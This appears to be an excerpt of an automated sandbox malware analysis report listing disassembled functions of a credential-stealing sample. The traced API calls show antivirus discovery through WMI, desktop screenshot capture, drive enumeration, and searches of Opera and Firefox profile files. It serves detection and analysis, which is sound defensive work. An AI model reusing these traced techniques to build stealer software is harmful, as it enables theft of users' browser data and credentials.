                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                              • API String ID: 4288110179-315474579
                                                                                                                                                                                                              • Opcode ID: 299feba09b3a39153b87f38de37d325ce2f23cde853cbb009136bfda6f239ffd
                                                                                                                                                                                                              • Instruction ID: a4c20861b3c1dcd803c2bd9210fadbb4feba879289155a51e7d6ea80804f3f8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 299feba09b3a39153b87f38de37d325ce2f23cde853cbb009136bfda6f239ffd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72313C71A04309BBCB20DBA6DC49EAFBFBDEFC5B12F104509F521A61E0D6745A01CB20
                                                                                                                                                                                                              Function 00931F2A Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00931F6B
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00931F79
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00931F86
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00931F8D
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00931F96
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00931FA6
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00931FB3
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00931FCF
                                                                                                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 0093201E
                                                                                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 00932027
                                                                                                                                                                                                              • GlobalSize.KERNEL32(?), ref: 00932033
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00925482: lstrlenA.KERNEL32(?), ref: 00925519
                                                                                                                                                                                                                • Part of subcall function 00925482: StrCmpCA.SHLWAPI(?,00956976,0095695B,00956957,0095694B), ref: 00925588
                                                                                                                                                                                                                • Part of subcall function 00925482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009255AA
                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00932091
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 009320AC
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 009320B5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 009320BD
                                                                                                                                                                                                              • CloseWindow.USER32(00000000), ref: 009320C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2610876673-0
                                                                                                                                                                                                              • Opcode ID: 3df524547daba44035bae364c689ed83dd033085bf1749ef80964449f55a1f59
                                                                                                                                                                                                              • Instruction ID: 5230ba11d9ee6c1016d9d77f2cb2399cc4e75330d12da6da57f655d77a1eccb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3df524547daba44035bae364c689ed83dd033085bf1749ef80964449f55a1f59
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E551E272800118AFDB11AFA0ED499EEBF79FF48314B044465F919E7120DB309A99DFA1
                                                                                                                                                                                                              Function 00921D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,0095AA54,0095AA58,009569EE,009569EB,00937A94,?,00000000), ref: 00921FA4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095AA5C), ref: 00921FD7
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095AA60), ref: 00921FF1
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,0095AA64,0095AA68,?,0095AA6C,009569EF), ref: 009220DD
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 009222C3
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00922336
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 009223A2
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 009223B6
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 009225DC
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092264F
                                                                                                                                                                                                                • Part of subcall function 00937023: Sleep.KERNEL32(000003E8,?,?), ref: 0093708A
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 009226C6
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 009226DA
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 1475085387-1173974218
                                                                                                                                                                                                              • Opcode ID: 066d7a53e417de63e1d3366371dc7e8fca81776c18c6d2b9ab07ba9bc43c590c
                                                                                                                                                                                                              • Instruction ID: b5e34fa3dc86071a6b72445ea3d2cb689ece928d20fdbd4a780da27125690d00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 066d7a53e417de63e1d3366371dc7e8fca81776c18c6d2b9ab07ba9bc43c590c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D432C2359501299BCB21FB25ED56BCDB779AF84300F4141E1B948B716ADB70AFCA8F80
                                                                                                                                                                                                              Function 0093547D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009354AA
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 009354C1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A88), ref: 009354E2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A8C), ref: 009354FC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 0093554D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935560
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935574
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935587
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956A90), ref: 00935599
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 009355AD
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00935663
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00935677
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                              • API String ID: 1150833511-4073750446
                                                                                                                                                                                                              • Opcode ID: b92ee8c52f00a5e1d22f6022045cc11ffb565bad42fa6d1bb39896e43801fba5
                                                                                                                                                                                                              • Instruction ID: 2ae679bfa845a23c37e2a7c1060fa20d655d9e3d6d15eda3f54cad977f288bfc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b92ee8c52f00a5e1d22f6022045cc11ffb565bad42fa6d1bb39896e43801fba5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF51F6B190022C9BDF60DF64DC89AC9B7BCAF49315F4045E5A60DE3250EB31AB89CF65
                                                                                                                                                                                                              Function 0092BF22 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,0095682E,0092CC40,?,?), ref: 0092BF9A
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957468), ref: 0092BFBA
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095746C), ref: 0092BFD4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera,0095683B,0095683A,00956837,00956836,00956833,00956832,0095682F), ref: 0092C060
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0092C06E
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0092C07C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                              • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                              • API String ID: 2567437900-1710495004
                                                                                                                                                                                                              • Opcode ID: a8ea90f94f536c707bff68b65e76450d9b1e59429b34b7de27a91d292f71fba3
                                                                                                                                                                                                              • Instruction ID: a978e0aae5aed41c8a310c465349f8b70d5b31767a0cb60e496bd95f999bcb35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8ea90f94f536c707bff68b65e76450d9b1e59429b34b7de27a91d292f71fba3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E402E336950129ABCB21FB25ED56BDDB775AF84304F4141E1B948B712ADB30AFC98F80
                                                                                                                                                                                                              Function 00935182 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00935202
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00935225
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0093522E
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 0093524E
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 00935269
                                                                                                                                                                                                                • Part of subcall function 00934D08: wsprintfA.USER32 ref: 00934D5C
                                                                                                                                                                                                                • Part of subcall function 00934D08: FindFirstFileA.KERNEL32(?,?), ref: 00934D73
                                                                                                                                                                                                                • Part of subcall function 00934D08: _memset.LIBCMT ref: 00934D8F
                                                                                                                                                                                                                • Part of subcall function 00934D08: _memset.LIBCMT ref: 00934DA0
                                                                                                                                                                                                                • Part of subcall function 00934D08: StrCmpCA.SHLWAPI(?,00956A00), ref: 00934DC1
                                                                                                                                                                                                                • Part of subcall function 00934D08: StrCmpCA.SHLWAPI(?,00956A04), ref: 00934DDB
                                                                                                                                                                                                                • Part of subcall function 00934D08: wsprintfA.USER32 ref: 00934E02
                                                                                                                                                                                                                • Part of subcall function 00934D08: StrCmpCA.SHLWAPI(?,0095660F), ref: 00934E16
                                                                                                                                                                                                                • Part of subcall function 00934D08: wsprintfA.USER32 ref: 00934E3F
                                                                                                                                                                                                                • Part of subcall function 00934D08: _memset.LIBCMT ref: 00934E68
                                                                                                                                                                                                                • Part of subcall function 00934D08: lstrcatA.KERNEL32(?,?), ref: 00934E7D
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0093528A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00935304
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                              • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                              • API String ID: 441469471-147700698
                                                                                                                                                                                                              • Opcode ID: c3f4ce1e79c6f0395b3ac4d80426a602b99c29642dd66f0155c11da5fbab912b
                                                                                                                                                                                                              • Instruction ID: 5deaa2b309e6551bdb99b0cd59320d6a2ee73fc183d4c0de64b90cf36d066b37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3f4ce1e79c6f0395b3ac4d80426a602b99c29642dd66f0155c11da5fbab912b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE5118B1900218AFDF219F60CC85BDEBBB8EF49304F004199EA48A7111EB319E89CF55
                                                                                                                                                                                                              Function 0092D59B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,00957568,00956887,?,?,?), ref: 0092D61C
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095756C), ref: 0092D63D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957570), ref: 0092D657
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,prefs.js,00957574,?,0095688F), ref: 0092D6E3
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092D7BD
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092D888
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 0092D92B
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092D93F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
